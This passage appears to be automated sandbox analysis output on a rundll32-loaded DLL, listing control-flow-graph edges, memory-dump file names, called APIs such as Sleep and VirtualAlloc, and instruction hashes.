131 6c7c6408-6c7c641b 115->131 116->117 132 6c7c5b29-6c7c5b3e 116->132 117->104 165 6c7c5b90-6c7c5b96 117->165 133 6c7c62f6-6c7c6306 118->133 119->133 134 6c7c62f1 call 6c7c57dc 119->134 138 6c7c646c-6c7c6486 call 6c7c5790 call 6c7c5f88 122->138 139 6c7c6469 122->139 125->110 142 6c7c639e-6c7c63a9 Sleep 125->142 126->83 127->109 127->126 128->112 143 6c7c62b4-6c7c62bd Sleep 128->143 145 6c7c6424-6c7c6430 130->145 131->145 148 6c7c641d-6c7c641f call 6c7c581c 131->148 146 6c7c5b40 132->146 147 6c7c5b42-6c7c5b56 VirtualAlloc 132->147 151 6c7c6308-6c7c630d call 6c7c581c 133->151 152 6c7c6312-6c7c631f 133->152 134->133 139->138 158 6c7c5be8-6c7c5bf5 call 6c7c57c0 call 6c7c5f88 141->158 159 6c7c5be0-6c7c5be5 141->159 142->108 143->100 145->123 146->147 147->117 161 6c7c5b58-6c7c5b6c VirtualAlloc 147->161 148->145 151->152 154->155 158->104 159->158 161->117 170 6c7c5b6e-6c7c5b81 161->170 171 6c7c5b98-6c7c5b9d 165->171 172 6c7c5ba0-6c7c5bb9 call 6c7c5790 call 6c7c5f88 165->172 170->104 171->172 172->104
                    Memory Dump Source
                    • Source File: 0000000F.00000002.1858086486.000000006C7C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6C7C0000, based on PE: true
                    • Associated: 0000000F.00000002.1858053932.000000006C7C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000F.00000002.1858086486.000000006C7DE000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000F.00000002.1858827618.000000006CD4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000F.00000002.1858860200.000000006CD4F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000F.00000002.1858886819.000000006CD50000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000F.00000002.1858911013.000000006CD53000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000F.00000002.1858937048.000000006CD56000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000F.00000002.1858962632.000000006CD59000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000F.00000002.1858984990.000000006CD5B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000F.00000002.1859009218.000000006CD60000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000F.00000002.1859031907.000000006CD65000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000F.00000002.1859055641.000000006CD67000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000F.00000002.1859086762.000000006CD68000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000F.00000002.1859086762.000000006CD6A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_6c7c0000_rundll32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 1ea60b9ef0bf18137861c3ac71fbddb7810b44d25914d07aa2ed1a1db3fc3233
                    • Instruction ID: f2c5e0198c3a1b731bd94b34d50d29ae6638226b3bc0050a8b946f17ed47c2a2
                    • Opcode Fuzzy Hash: 1ea60b9ef0bf18137861c3ac71fbddb7810b44d25914d07aa2ed1a1db3fc3233
                    • Instruction Fuzzy Hash: 2CC138627116020FE7048A7CEEC87AEB696DBC5325F58823DE214CBBC6DB75CA459343
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 6C7C5C04 Relevance: 9.0, APIs: 7, Instructions: 298sleepCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 183 6c7c5c04-6c7c5c16 184 6c7c5c1c-6c7c5c2c 183->184 185 6c7c5e64-6c7c5e69 183->185 186 6c7c5c2e-6c7c5c3b 184->186 187 6c7c5c84-6c7c5c8d 184->187 188 6c7c5f7c-6c7c5f7f 185->188 189 6c7c5e6f-6c7c5e80 185->189 192 6c7c5c3d-6c7c5c4a 186->192 193 6c7c5c54-6c7c5c60 186->193 187->186 194 6c7c5c8f-6c7c5c9b 187->194 190 6c7c5f85-6c7c5f87 188->190 191 6c7c59b0-6c7c59d9 VirtualAlloc 188->191 195 6c7c5e28-6c7c5e35 189->195 196 6c7c5e82-6c7c5e9e 189->196 197 6c7c5a0b-6c7c5a11 191->197 198 6c7c59db-6c7c5a08 call 6c7c5964 191->198 201 6c7c5c4c-6c7c5c50 192->201 202 6c7c5c74-6c7c5c81 192->202 203 6c7c5cd8-6c7c5ce1 193->203 204 6c7c5c62-6c7c5c70 193->204 194->186 206 6c7c5c9d-6c7c5ca9 194->206 195->196 205 6c7c5e37-6c7c5e40 195->205 199 6c7c5eac-6c7c5ebb 196->199 200 6c7c5ea0-6c7c5ea8 196->200 198->197 209 6c7c5ebd-6c7c5ed1 199->209 210 6c7c5ed4-6c7c5edc 199->210 208 6c7c5f08-6c7c5f1e 200->208 211 6c7c5d1c-6c7c5d26 203->211 212 6c7c5ce3-6c7c5cf0 203->212 205->195 213 6c7c5e42-6c7c5e56 Sleep 205->213 206->186 214 6c7c5cab-6c7c5cb7 206->214 222 6c7c5f37-6c7c5f43 208->222 223 6c7c5f20-6c7c5f2e 208->223 209->208 217 6c7c5ede-6c7c5ef6 210->217 218 6c7c5ef8-6c7c5efa call 6c7c58e8 210->218 220 6c7c5d98-6c7c5da4 211->220 221 6c7c5d28-6c7c5d53 211->221 212->211 219 6c7c5cf2-6c7c5cfb 212->219 213->196 224 6c7c5e58-6c7c5e5f Sleep 213->224 214->187 215 6c7c5cb9-6c7c5cc9 Sleep 214->215 215->186 227 6c7c5ccf-6c7c5cd6 Sleep 215->227 228 6c7c5eff-6c7c5f07 217->228 218->228 219->212 229 6c7c5cfd-6c7c5d11 Sleep 219->229 225 6c7c5dcc-6c7c5ddb call 6c7c58e8 220->225 226 6c7c5da6-6c7c5db8 220->226 231 6c7c5d6c-6c7c5d7a 221->231 232 6c7c5d55-6c7c5d63 221->232 234 6c7c5f64 222->234 235 6c7c5f45-6c7c5f58 222->235 223->222 233 6c7c5f30 223->233 224->195 245 6c7c5ded-6c7c5e26 225->245 249 6c7c5ddd-6c7c5de7 225->249 236 6c7c5dbc-6c7c5dca 226->236 237 6c7c5dba 226->237 227->187 229->211 240 6c7c5d13-6c7c5d1a Sleep 229->240 242 6c7c5d7c-6c7c5d96 call 6c7c581c 231->242 243 6c7c5de8 231->243 232->231 241 6c7c5d65 232->241 233->222 238 6c7c5f69-6c7c5f7b 234->238 235->238 244 6c7c5f5a-6c7c5f5f call 6c7c581c 235->244 236->245 237->236 240->212 241->231 242->245 243->245 244->238
                    APIs
                    • Sleep.KERNEL32(00000000), ref: 6C7C5CBB
                    • Sleep.KERNEL32(0000000A,00000000), ref: 6C7C5CD1
                    • Sleep.KERNEL32(00000000), ref: 6C7C5CFF
                    • Sleep.KERNEL32(0000000A,00000000), ref: 6C7C5D15
                    Memory Dump Source
                    • Source File: 0000000F.00000002.1858086486.000000006C7C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6C7C0000, based on PE: true
                    • Associated: 0000000F.00000002.1858053932.000000006C7C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000F.00000002.1858086486.000000006C7DE000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000F.00000002.1858827618.000000006CD4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000F.00000002.1858860200.000000006CD4F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000F.00000002.1858886819.000000006CD50000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000F.00000002.1858911013.000000006CD53000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000F.00000002.1858937048.000000006CD56000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000F.00000002.1858962632.000000006CD59000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000F.00000002.1858984990.000000006CD5B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000F.00000002.1859009218.000000006CD60000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000F.00000002.1859031907.000000006CD65000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000F.00000002.1859055641.000000006CD67000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000F.00000002.1859086762.000000006CD68000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000F.00000002.1859086762.000000006CD6A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_6c7c0000_rundll32.jbxd
                    Similarity
                    • API ID: Sleep
                    • String ID:
                    • API String ID: 3472027048-0
                    • Opcode ID: e3c4e3bc7278a8916eb5486ca12de4840350277834837aaa8f53c5b68baf8ce9
                    • Instruction ID: 3ad47697c7567809d0d2c5fc4ed53e3fdf55c7785e0609ed8d820f4237a0854e
                    • Opcode Fuzzy Hash: e3c4e3bc7278a8916eb5486ca12de4840350277834837aaa8f53c5b68baf8ce9
                    • Instruction Fuzzy Hash: 03C163767053428FEB45CF29EAC435ABBF5AB82314F58827ED1148BBC1CBB19440DB82
                    Uniqueness

                    Uniqueness Score: -1.00%